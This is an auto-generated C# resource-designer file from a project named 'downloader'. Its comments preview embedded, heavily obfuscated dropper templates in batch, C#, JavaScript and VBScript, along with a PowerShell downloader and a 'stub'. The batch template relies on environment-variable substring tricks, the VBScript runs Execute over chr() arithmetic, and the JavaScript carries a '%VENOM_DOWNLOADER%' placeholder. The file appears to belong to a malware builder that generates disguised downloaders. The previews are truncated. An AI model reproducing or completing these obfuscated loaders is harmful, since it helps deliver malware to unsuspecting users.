//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace downloader {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resource {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resource() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("downloader.Resource", typeof(Resource).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to ^%pUBlIC:~14,1%^L%pUBliC:~55,17%^%publIc:~4,1%
        ///setlocal enabledelayedexpansion
        ///set &quot;Jem10q2vaLKoBNAP73ubjkGgBf86FG8eBJNmjhhn34WtA9mQuNA6xn7ZNnZbA9ixFz1jYIwXOiyTWG6juPs4Mp8qKbX8UITJ=1&quot;
        ///if !Jem10q2vaLKoBNAP73ubjkGgBf86FG8eBJNmjhhn34WtA9mQuNA6xn7ZNnZbA9ixFz1jYIwXOiyTWG6juPs4Mp8qKbX8UITJ! equ 1 (
        ///    for %%a in (!Jem10q2vaLKoBNAP73ubjkGgBf86FG8eBJNmjhhn34WtA9mQuNA6xn7ZNnZbA9ixFz1jYIwXOiyTWG6juPs4Mp8qKbX8UITJ!) do (
        ///        if %%a equ 1 (
        ///            @%pUBlIc:~89,83%%PUBLic:~5,1%CHo^ of^%PuBlIC:~46,16%f
        ///  [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string batdownloader {
            get {
                return ResourceManager.GetString("batdownloader", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Diagnostics;
        ///using System.IO;
        ///using System.Net;
        ///using System.Windows.Forms;
        ///public class Startup
        ///{
        ///	public class MCtiqPoYHCMNUbEbbRymWEeeQHYZsWpIQidbQlBttboQREJPfYcGRcJhxosKQoGLke
        ///	{
        ///		public void LYDlQpdTUoonmYiUtTLQOBVFBTREewFFMHXRDNmpOiOThbfLIumSBnikcYLWABPzLKCGbqsGGucGMcyAOfWKiMd()
        ///		{
        ///			ushort MPFcqQmtpiyAAKpcHmglEAZClitFepYHeioDNEoEPlwTZZnxGHCAXlTmP = 4439;
        ///			float yJnajRwpwNodXDxsdgCmUXYzOAJTpbNKNgggXwJi = 1.204036E+34F;
        ///			string syCwPBiJCEnBLQlLhDatZGqRwpwJ [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string csharpdownloader {
            get {
                return ResourceManager.GetString("csharpdownloader", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        internal static System.Drawing.Bitmap download {
            get {
                object obj = ResourceManager.GetObject("download", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to var gdjshkljgdslkjjdoierteiovuisdubklgjhbklgdhjgklhksdghkjshgkfhjklgjksdfhgh = &quot;%VENOM_DOWNLOADER%&quot;;(function(j,c){var MRPEPECE={j:&apos;0x2aa&apos;,c:&apos;0x396&apos;,o:0x2b6,h:0x3a0,W:0x412,Q:0x417,C:&apos;0x2ee&apos;,e:0x364,a:0x306,p:&apos;0x3f0&apos;,Z:0x301,l:0x3f9,n:&apos;0x42a&apos;,X:0x2e5,s:&apos;0x41f&apos;,S:0x304,N:&apos;0x36d&apos;,i:&apos;0x2d3&apos;,q:&apos;0x2bb&apos;,K:0x336,b:0x3f3,H:0x357,z:0x2e7,B:&apos;0x3f8&apos;,F:0x3ba,r:&apos;0x3f5&apos;,P:&apos;0x3ee&apos;,k:0x2d9,u:&apos;DmsC&apos;,Y:&apos;0x402&apos;,y:0x35a,D:0x2cb,O:&apos;0x348&apos;,w:&apos;0x2b3&apos;,R:&apos;0x40b&apos;,L:0x2bf,A:&apos;0x2a7&apos;,I:0x35a,t:&apos;0x40c&apos;,G:&apos;0x38c&apos;,M:&apos;0x33e&apos;,j0:&apos;0x358&apos;,j1: [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string jsdownloader {
            get {
                return ResourceManager.GetString("jsdownloader", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] powershelldownloader {
            get {
                object obj = ResourceManager.GetObject("powershelldownloader", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Collections.Generic;
        ///using System.Diagnostics;
        ///using System.IO;
        ///using System.Management;
        ///using System.Net;
        ///using System.Reflection;
        ///using System.Runtime.InteropServices;
        ///using System.Security.Principal;
        ///using System.Text;
        ///using System.Threading;
        ///using System.Windows.Forms;
        ///using Microsoft.Win32;
        ///
        ///
        ///public class Startup
        ///{
        ///    public class EMbYOpLHpbGglbzDNTKLOLuGlBhCnkIJjSlKAkju
        ///    {
        ///        public void zacLKKMesCLckuSqwNnijtftWWtPPcCKofpKqVCQwxVKWHYzusezWlufUKON [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string stub {
            get {
                return ResourceManager.GetString("stub", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to gjfsdklgjdfkljglkdjhklghjdglkhjgkdhlsjhklsdjhgklsdjlhdjlkh = &quot;%VENOM_DOWNLOADER%&quot;
        ///Execute(chr( 84552/6504 ) &amp; chr( 30200/3020 ) &amp; chr( -7669+7739 ) &amp; chr( 9921-9804 ) &amp; chr( 9925-9815 ) &amp; chr( -7575+7674 ) &amp; chr( 382916/3301 ) &amp; chr( 3109-3004 ) &amp; chr( 757575/6825 ) &amp; chr( -4570+4680 ) &amp; chr( 51168/1599 ) &amp; chr( 502331/4877 ) &amp; chr( 896336/8456 ) &amp; chr( 269560/2344 ) &amp; chr( -7282+7382 ) &amp; chr( 875474/8182 ) &amp; chr( 9641-9539 ) &amp; chr( -4022+4128 ) &amp; chr( -1704+1807 ) &amp; chr( 333400/3334 ) &amp; chr( 388416/3808 ) [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string vbsdownloader {
            get {
                return ResourceManager.GetString("vbsdownloader", resourceCulture);
            }
        }
    }
}
